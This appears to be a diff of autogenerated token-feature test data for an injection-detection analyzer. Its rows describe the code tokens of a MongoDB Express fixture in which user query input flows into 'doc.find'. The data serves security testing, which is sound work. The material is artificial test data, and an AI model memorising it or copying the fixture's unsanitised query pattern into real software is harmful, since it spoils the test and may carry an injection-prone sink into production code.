query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:17:15:36 | exceptional return of db.collection('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:17:15:36 | exceptional return of db.collection('doc') | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:20:15:29 | collection | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:20:15:29 | collection | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:20:15:29 | collection | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:20:15:29 | collection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:20:15:29 | collection | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:31:15:35 | 'doc' | CalleeFlexibleAccessPath | db.collection | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:31:15:35 | 'doc' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:31:15:35 | 'doc' | contextFunctionInterfaces | | @@ -2071,6 +11170,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:31:15:35 | 'doc' | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:31:15:35 | 'doc' | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:31:15:35 | 'doc' | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:7:18:9 | doc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:7:18:9 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:7:18:9 | doc | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:7:18:9 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:7:18:9 | doc | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:7:18:14 | doc.find | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:7:18:14 | doc.find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:7:18:14 | doc.find | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:7:18:14 | doc.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:7:18:14 | doc.find | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:7:18:21 | doc.find(query) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:7:18:21 | doc.find(query) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:7:18:21 | doc.find(query) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:7:18:21 | doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:7:18:21 | doc.find(query) | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:7:18:21 | exceptional return of doc.find(query) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:7:18:21 | exceptional return of doc.find(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:7:18:21 | exceptional return of doc.find(query) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:7:18:21 | exceptional return of doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:7:18:21 | exceptional return of doc.find(query) | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:11:18:14 | find | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:11:18:14 | find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:11:18:14 | find | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:11:18:14 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:11:18:14 | find | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:16:18:20 | query | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:16:18:20 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:16:18:20 | query | contextFunctionInterfaces | | @@ -2079,6 +11203,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:16:18:20 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:16:18:20 | query | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:18:16:18:20 | query | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:1:22:3 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:1:22:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:1:22:3 | app | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:1:22:8 | app.post | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:1:22:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:1:22:8 | app.post | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:1:31:2 | app.pos ... });\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:1:31:2 | app.pos ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:1:31:2 | app.pos ... });\\n}) | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:1:31:2 | exceptional return of app.pos ... });\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:1:31:2 | exceptional return of app.pos ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:1:31:2 | exceptional return of app.pos ... });\\n}) | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:5:22:8 | post | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:5:22:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:5:22:8 | post | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:10:22:26 | '/documents/find' | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:10:22:26 | '/documents/find' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:10:22:26 | '/documents/find' | calleeImports | express | @@ -2086,6 +11225,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:10:22:26 | '/documents/find' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:10:22:26 | '/documents/find' | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:10:22:26 | '/documents/find' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:22:28 | MongoClient | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:22:28 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:22:28 | MongoClient | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:22:28 | MongoClient | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:22:28 | MongoClient | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:22:29 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:22:29 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:22:29 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:22:29 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:22:29 | query | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | 'arguments' object of anonymous function | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | (req, r ... });\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | (req, r ... });\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | (req, r ... });\\n} | calleeImports | express | @@ -2093,11 +11247,125 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | (req, r ... });\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | (req, r ... });\\n} | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | (req, r ... });\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | exceptional return of anonymous function | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | exceptional return of anonymous function | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | return of anonymous function | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:29:31:1 | return of anonymous function | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:30:22:32 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:30:22:32 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:30:22:32 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:30:22:32 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:30:22:32 | req | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:30:22:32 | req | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:30:22:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:30:22:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:30:22:32 | req | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:30:22:32 | req | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:35:22:37 | res | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:35:22:37 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:35:22:37 | res | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:35:22:37 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:22:35:22:37 | res | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:11:23:15 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:11:23:15 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:11:23:15 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:11:23:15 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:11:23:15 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:11:23:15 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:11:23:15 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:11:23:15 | query | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:11:23:20 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:11:23:20 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:11:23:20 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:11:23:20 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:11:23:20 | query | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:11:23:20 | query = {} | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:11:23:20 | query = {} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:11:23:20 | query = {} | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:11:23:20 | query = {} | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:11:23:20 | query = {} | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:19:23:20 | {} | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:19:23:20 | {} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:19:23:20 | {} | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:19:23:20 | {} | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:23:19:23:20 | {} | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:5:24:9 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:5:24:9 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:5:24:9 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:5:24:9 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:5:24:9 | query | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:5:24:15 | query.title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:5:24:15 | query.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:5:24:15 | query.title | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:5:24:15 | query.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:5:24:15 | query.title | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:5:24:33 | query.t ... y.title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:5:24:33 | query.t ... y.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:5:24:33 | query.t ... y.title | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:5:24:33 | query.t ... y.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:5:24:33 | query.t ... y.title | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:11:24:15 | title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:11:24:15 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:11:24:15 | title | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:11:24:15 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:11:24:15 | title | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:19:24:21 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:19:24:21 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:19:24:21 | req | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:19:24:21 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:19:24:21 | req | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:19:24:27 | req.query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:19:24:27 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:19:24:27 | req.query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:19:24:27 | req.query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:19:24:27 | req.query | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:19:24:33 | req.query.title | assignedToPropName | title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:19:24:33 | req.query.title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:19:24:33 | req.query.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:19:24:33 | req.query.title | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:19:24:33 | req.query.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:19:24:33 | req.query.title | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:23:24:27 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:23:24:27 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:23:24:27 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:23:24:27 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:23:24:27 | query | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:29:24:33 | title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:29:24:33 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:29:24:33 | title | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:29:24:33 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:24:29:24:33 | title | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:5:25:15 | MongoClient | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:5:25:15 | MongoClient | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:5:25:15 | MongoClient | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:5:25:15 | MongoClient | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:5:25:15 | MongoClient | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:5:25:23 | MongoClient.connect | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:5:25:23 | MongoClient.connect | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:5:25:23 | MongoClient.connect | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:5:25:23 | MongoClient.connect | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:5:25:23 | MongoClient.connect | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:5:30:6 | MongoCl ... \\n }) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:5:30:6 | MongoCl ... \\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:5:30:6 | MongoCl ... \\n }) | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:5:30:6 | MongoCl ... \\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:5:30:6 | MongoCl ... \\n }) | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:5:30:6 | exceptional return of MongoCl ... \\n }) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:5:30:6 | exceptional return of MongoCl ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:5:30:6 | exceptional return of MongoCl ... \\n }) | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| 